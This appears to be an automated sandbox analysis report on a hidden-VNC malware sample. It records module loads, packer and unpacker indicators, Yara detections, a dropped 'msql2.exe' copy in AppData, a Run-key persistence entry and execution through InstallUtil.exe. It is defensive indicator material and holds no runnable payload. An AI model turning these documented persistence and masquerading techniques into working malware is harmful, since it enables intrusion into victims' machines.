Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: hvnc-CR-SCR-0710.bin.exe

Static file information: File size 1489920 > 1048576

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16b200

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: hvnc-CR-SCR-0710.bin.exe, ProxyRegModel.cs	.Net Code: ResolveAccount System.AppDomain.Load(byte[])
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.hvnc-CR-SCR-0710.bin.exe.65f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745104377.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msql2.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msql2.exe PID: 5356, type: MEMORYSTR

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06402EA7 push esp; retf	0_2_06402EA8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_0643E2B1 push es; ret	0_2_0643E2C0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_0643730A pushfd ; iretd	0_2_06437311
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06430178 push es; ret	0_2_06430230
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064361AE pushad ; ret	0_2_064361B1
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A1F09 push es; ret	0_2_064A1F28
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064AAAE6 push ebx; iretd	0_2_064AAAEC
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A4181 push es; retf	0_2_064A418C
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064EDEC6 push ebp; retf	0_2_064EDECA
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064EDF10 push ecx; retf	0_2_064EDF17
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064E842E push cs; iretd	0_2_064E842F
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064EDB2E push es; iretd	0_2_064EDB39
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064EDBBA push es; ret	0_2_064EDBBC
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064EE072 push eax; retf	0_2_064EE074
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F7DE6 push es; retf	0_2_064F7DEC
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FDA5E push es; ret	0_2_064FDA70
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FFBC0 push esp; iretd	0_2_064FFBC1
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068C31AF push ebx; iretd	0_2_068C31B4
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068C6905 push ebp; retf	0_2_068C6908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C903E push 8B0391DEh; iretd	1_2_056C9043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056CF833 pushfd ; ret	1_2_056CF839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C9220 push esp; retf	1_2_056C9221
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06906C41 push es; iretd	1_2_06906C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0690B277 push FFFFFF8Bh; iretd	1_2_0690B279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0690892F push es; retf	1_2_06908930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06915F55 push es; ret	1_2_0691F180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06917AF1 push es; ret	1_2_0691F180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06946E76 push es; retf	1_2_06946E77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06941661 push es; iretd	1_2_06941680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06941F41 push E8063C5Ch; ret	1_2_06941F51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0694158A push es; retf	1_2_0694158C

Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6160000.7.raw.unpack, rFREDnE8Q57vkPqId0l.cs

High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ygNEwUWi3A', 'NtProtectVirtualMemory', 'ahZ1hiZi2CtiMVqstj1', 'S7sSiCZxubdpOksOSRV', 'BdrZXnZnOwSR7WfiEbv', 'xtWD9QZItrlQOrXJ60F'

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

File created: C:\Users\user\AppData\Roaming\msql2.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msql2			Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msql2			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\7E3428F307F367955C10BD5DADDA50A0 cf4a1546df876ebdbbe37e383d458f50

Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
